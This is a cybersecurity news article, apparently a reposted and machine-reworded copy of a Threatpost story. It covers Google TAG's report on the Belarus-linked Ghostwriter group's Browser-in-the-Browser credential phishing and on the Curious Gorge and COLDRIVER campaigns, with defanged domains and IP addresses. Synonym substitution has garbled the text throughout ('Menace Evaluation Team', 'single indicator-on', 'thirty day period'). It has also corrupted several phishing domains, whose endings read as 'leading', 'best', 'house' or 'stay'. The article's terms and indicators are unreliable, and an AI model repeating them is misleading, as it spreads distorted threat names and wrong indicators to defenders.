• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
belarusian ‘ghostwriter’ actor picks up bitb for ukraine related attacks

Belarusian ‘Ghostwriter’ Actor Picks Up BitB for Ukraine-Related Attacks

You are here: Home / Latest Cyber Security Vulnerabilities / Belarusian ‘Ghostwriter’ Actor Picks Up BitB for Ukraine-Related Attacks
March 31, 2022

Ghostwriter is a single of 3 campaigns working with war-themed attacks, with cyber-fire coming in from governing administration-backed actors in China, Iran, North Korea & Russia.

Ghostwriter – a threat actor earlier connected with the Belarusian Ministry of Defense – has glommed onto the a short while ago disclosed, just about invisible “Browser-in-the-Browser” (BitB) credential-phishing system in order to keep on its ongoing exploitation of the war in Ukraine.

In a Wednesday post, Google’s Menace Evaluation Team (TAG) explained that they’d now spotted BitB staying utilised by various governing administration-backed actors prior to the media turning a laser eye on BitB earlier this thirty day period. The fresh attention was triggered by a penetration tester and security researcher – who goes by the tackle mr.d0x – who posted a description of BitB.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


Ghostwriter actors swiftly picked up on BitB, combining it with an additional of the innovative persistent threat’s (APT’s) phishing techniques: namely, hosting credential-phishing landing web pages on compromised web sites.

BitB

The newly disclosed credential-phishing strategy of BitB  requires benefit of third-party single indicator-on (SSO) options embedded on web sites that issue popup windows for authentication, this kind of as “Sign in with Google,” Facebook, Apple or Microsoft.

These days, SSO popups are a schedule way to authenticate when you signal in.

But in accordance to mr.d0x’s publish, absolutely fabricating a destructive version of a popup window is a snap: It’s “quite simple” utilizing fundamental HTML/CSS, the researcher stated a couple of weeks in the past. The concocted popups simulate a browser window in just the browser, spoofing a legit area and building it possible to stage convincing phishing attacks.

“Combine the window style with an iframe pointing to the destructive server hosting the phishing web page, and [it’s] in essence indistinguishable,” mr.d0x wrote at the time.

JavaScript can make the window surface on a website link, button simply click or web site loading monitor. As nicely, libraries – these as the common JQuery JavaScript library – can make the window show up visually desirable.

BitB Credential Phishing on Compromised Internet sites

In Wednesday’s submit, TAG gave an illustration, demonstrated down below, of how Ghostwriter has taken to hosting credential phishing landing web pages on compromised sites:

Example of hosting credential phishing landing pages on compromised websites. Source: TAG.

The BitB approach shown over involves drawing a login site that appears to be on the passport.i.ua domain, about the webpage hosted on the compromised site. “Once a consumer supplies qualifications in the dialog, they are posted to an attacker controlled domain,” TAG scientists reported.

TAG has a short while ago observed Ghostwriter credential-phishing on these domains:

  • login-verification[.]leading
  • login-validate[.]leading
  • ua-login[.]best
  • protected-ua[.]house
  • safe-ua[.]top rated

Other Strategies Released by Federal government-Backed Actors in China, Iran, North Korea & Russia

Considering that early March, Ghostwriter’s use of BitB is only just one of a trio of cyber aggressions that TAG has been tracking with regards to Russia’s invasion of Ukraine.

The use of the war as a entice in phishing and malware campaigns has continued to improve all over the month, TAG mentioned, with related cyber-assaults coming in from government-backed actors from China, Iran, North Korea and Russia, as effectively as from numerous unattributed groups, in accordance to TAG’s Wednesday put up.

Actors “have employed numerous Ukraine war-similar themes in an energy to get targets to open up destructive email messages or simply click destructive hyperlinks,” TAG stated.

Curious Gorge

Besides Ghostwriter’s BitB strategies, TAG has spotted a group it’s calling Curious Gorge that it attributes to China’s PLA SSF conducting strategies against govt and armed forces corporations in Ukraine, Russia, Kazakhstan and Mongolia.

“While this activity mostly does not effects Google solutions, we continue being engaged and are furnishing notifications to target organizations,” TAG recommended.

Underneath is a listing of IPs made use of in Curious Gorge campaigns that TAG has not too long ago noticed:

  • 5.188.108[.]119
  • 91.216.190[.]58
  • 103.27.186[.]23
  • 114.249.31[.]171
  • 45.154.12[.]167

COLDRIVER

At last, TAG has also observed COLDRIVER – a Russia-centered threat actor, in some cases referred to as Calisto – that has introduced credential-phishing campaigns concentrating on numerous United States-based mostly NGOs and think tanks, the military services of a Balkans country, and a Ukraine based mostly defense contractor.

Now, on the other hand, for the to start with time, COLDRIVER is focusing on the army of various Jap European international locations and a NATO Centre of Excellence, TAG documented.

Google doesn’t know how thriving these campaigns have been, provided that they were issued from newly created Gmail accounts to non-Google accounts. At any amount, Google has not see any Gmail accounts efficiently compromised due to the fact of these campaigns, TAG explained.

Just lately observed COLDRIVER credential phishing domains:

  • safeguard-url[.]online
  • push-share[.]live
  • protection-workplace[.]stay
  • proton-viewer[.]com

Transferring to the cloud? Find out emerging cloud-security threats together with sound suggestions for how to defend your property with our Totally free downloadable Ebook, “Cloud Security: The Forecast for 2022.” We discover organizations’ top rated risks and troubles, ideal practices for defense, and advice for security accomplishment in such a dynamic computing atmosphere, including helpful checklists.


Some elements of this posting are sourced from:
threatpost.com

Previous Post: «new mfa security standards for online payments come into force New MFA security standards for online payments come into force
Next Post: Apple Issues Patches for 2 Actively Exploited Zero-Days in iPhone, iPad and Mac Devices apple issues patches for 2 actively exploited zero days in iphone,»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Enzo Biochem Hit by Ransomware, 2.5 Million Patients’ Data Compromised
  • US and Korean Agencies Issue Warning on North Korean Cyber-Attacks
  • Malicious PyPI Packages Use Compiled Python Code to Bypass Detection
  • New Botnet Malware ‘Horabot’ Targets Spanish-Speaking Users in Latin America
  • The Importance of Managing Your Data Security Posture
  • Camaro Dragon Strikes with New TinyNote Backdoor for Intelligence Gathering
  • Insurers Predict $33bn Bill for Catastrophic “Cyber Event”
  • Chinese Phishing Gang “PostalFurious” Expands Campaign
  • Kaspersky Says it is Being Targeted By Zero-Click Exploits
  • North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks

Copyright © TheCyberSecurity.News, All Rights Reserved.